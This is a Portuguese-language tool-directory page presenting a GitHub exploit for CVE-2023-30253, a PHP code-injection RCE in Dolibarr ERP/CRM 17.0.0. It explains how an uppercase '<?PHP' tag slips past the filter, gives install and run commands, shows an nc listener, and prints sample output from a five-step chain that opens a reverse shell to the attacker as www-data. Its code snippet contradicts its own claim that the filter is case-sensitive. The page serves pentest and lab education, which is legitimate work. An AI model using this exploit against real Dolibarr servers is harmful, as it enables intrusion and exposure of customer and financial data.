Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-30253-exploit — CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE via injeção de código PHP (exploit educativo) | Kitploit
Ferramentas/GitHubGitHub/jeanback1/cve-2023-30253-exploit
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubjeanback1/cve-2023-30253-exploit

CVE-2023-30253-exploit

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 RCE via injeção de código PHP (exploit educativo)

Ver Repositório
8há 4 mesesAinda não revisado
Site

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 Execução Remota de Código

Python 3.8+ License CVSS

Exploit de injeção de código PHP para Dolibarr ERP/CRM v17.0.0 que permite obter uma shell reversa como usuário www-data através do módulo Website/CMS.

⚠️ Apenas para uso educacional e auditorias com autorização.


📑 Índice

  • O que é CVE-2023-30253?
  • Como a vulnerabilidade funciona?
  • Impacto
  • O que este exploit faz?
  • Requisitos
  • Instalação
  • Uso
  • Exemplo prático
  • O exploit passo a passo
  • Mitigação
  • Referências

🔍 O que é CVE-2023-30253?

CVE-2023-30253 é uma vulnerabilidade de injeção de código PHP (CWE-94: Controle Impróprio da Geração de Código) no Dolibarr ERP/CRM versões anteriores a 17.0.1.

Foi descoberta e reportada pela equipe da Swascan (agora Hacktivesecurity) em maio de 2023. A vulnerabilidade reside no módulo Website/CMS, que permite que usuários autenticados criem e gerenciem sites dentro do Dolibarr.

CampoValor
CVECVE-2023-30253
CVSS v3.18.8 (ALTO)
VetorAV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
TipoCWE-94 — Injeção de Código
Software afetadoDolibarr ERP/CRM < 17.0.1
PrivilégiosUsuário autenticado (qualquer função)
PatchDolibarr 17.0.1 — commit 4f6055c

⚙️ Como a vulnerabilidade funciona?

O Dolibarr implementa um filtro para evitar que os usuários injetem código PHP no conteúdo das páginas do módulo Website. No entanto, esse filtro tem um defeito crítico: ele é case-sensitive.

// Código vulnerável (simplificado) no Dolibarr 17.0.0
if (preg_match('/<\?php/i', $content)) {
    // Bloqueia apenas "<?php" em minúsculas exatas... ou não?
    die("PHP code detected!");
}

O filtro busca literalmente a string <?php em minúsculas. Mas o PHP permite qualquer combinação de maiúsculas e minúsculas para a tag de abertura. Isso significa que:

TagFiltrada?Executada pelo PHP?
<?php ... ?>✅✅
<?PHP ... ?>❌✅
<?Php ... ?>❌✅
<?pHp ... ?>❌✅

O exploit usa <?PHP (em maiúsculas) para burlar o filtro, mas qualquer variante funciona.

Além disso, o filtro só é aplicado no momento de salvar o conteúdo. Ao servir a página, o Dolibarr passa o conteúdo sem sanitização adicional para o interpretador PHP, que executa qualquer código com a tag de abertura <?.


💥 Impacto

Um atacante autenticado pode:

  • Execução remota de comandos (RCE) no servidor
  • Acessar o banco de dados do Dolibarr (clientes, faturas, usuários)
  • Ler arquivos sensíveis do sistema (/etc/passwd, configuração)
  • Usar o servidor como ponto de pivô para ataques internos
  • Instalar malware, webshells ou backdoors persistentes

Por que é crítico? O Dolibarr é usado como ERP/CRM empresarial. Uma intrusão pode expor dados de clientes, finanças, contratos e credenciais internas.


🛠️ O que este exploit faz?

O exploit automatiza o processo completo de exploração em 5 passos:

┌─────────────────────────────────────────────────────────┐
│                   CVE-2023-30253                       │
│                                                         │
│  1. Login          → Autenticar no Dolibarr             │
│  2. Create Website → Criar um site vazio                │
│  3. Create Page    → Criar uma página no site           │
│  4. Inject Shell   → Injetar PHP reverse shell          │
│  5. Trigger        → Executar o payload                 │
│                                                         │
│  Resultado: 🎯 Shell reversa como www-data              │
└─────────────────────────────────────────────────────────┘

Características:

  • ✅ Gerenciamento automático de tokens anti-CSRF
  • ✅ Sessão persistente com cookies
  • ✅ Detecção automática do pageid
  • ✅ Modo verbose para depuração
  • ✅ Saída com cores (desativáveis)
  • ✅ Payload de reverse shell via fsockopen + proc_open

📋 Requisitos

  • Python 3.8+
  • requests
  • beautifulsoup4

Ou simplesmente:

pip install -r requirements.txt

📦 Instalação

# Clonar o repositório
git clone https://github.com/jeanback1/CVE-2023-30253-exploit.git
cd CVE-2023-30253-exploit

# Instalar dependências
pip install -r requirements.txt

🚀 Uso

python exploit.py <target> <username> <password> <lhost> <lport> [opções]

Argumentos posicionais:

ArgumentoDescriçãoExemplo
targetURL base do Dolibarrhttp://crm.board.htb
usernameUsuário do Dolibarradmin
passwordSenha do Dolibarradmin
lhostSeu IP (onde receberá a shell)10.10.14.5
lportSua porta (onde receberá a shell)4444

Opções:

OpçãoDescrição
-v, --verboseMostra informações detalhadas de depuração
--no-colorDesativa cores na saída
-h, --helpMostra a ajuda e exemplos

🎯 Exemplo prático

Terminal 1 — Iniciar listener de shell reversa

nc -lvnp 4444

Terminal 2 — Executar exploit

python exploit.py http://crm.board.htb admin admin 10.10.14.5 4444 --verbose

Saída esperada

════════════════════════════════════════════════════════
 CVE-2023-30253 — Dolibarr 17.0.0 RCE Exploit
════════════════════════════════════════════════════════

  Target:   http://crm.board.htb
  User:     admin
  LHOST:    10.10.14.5
  LPORT:    4444
  Site ID:  s3a1f2bc

──────────────────────────────────────────────────

[10:45:12] Passo 1/5: Iniciando sessão...
[10:45:12]   ✓ Sessão iniciada com sucesso

[10:45:13] Passo 2/5: Criando site...
[10:45:13]   ✓ Site 's3a1f2bc' criado

[10:45:13] Passo 3/5: Criando página no site...
[10:45:13]   ✓ Página criada dentro do site

[10:45:14] Passo 4/5: Injetando reverse shell → 10.10.14.5:4444...
[10:45:14]   ✓ Código PHP injetado com sucesso

[10:45:14] Passo 5/5: Executando payload (trigger)...

════════════════════════════════════════════════════════
  EXPLORAÇÃO CONCLUÍDA
════════════════════════════════════════════════════════

  Trigger URL:
  http://crm.board.htb/public/website/index.php?website=s3a1f2bc&pageref=s3a1f2bc

  Instruções:
  1. Em outro terminal, inicie seu listener:
     nc -lvnp 4444
  2. Acesse a Trigger URL (o exploit já fez isso)
  3. Você receberá uma shell reversa como www-data

Terminal 1 — Shell obtida 🎯

Baixar ferramenta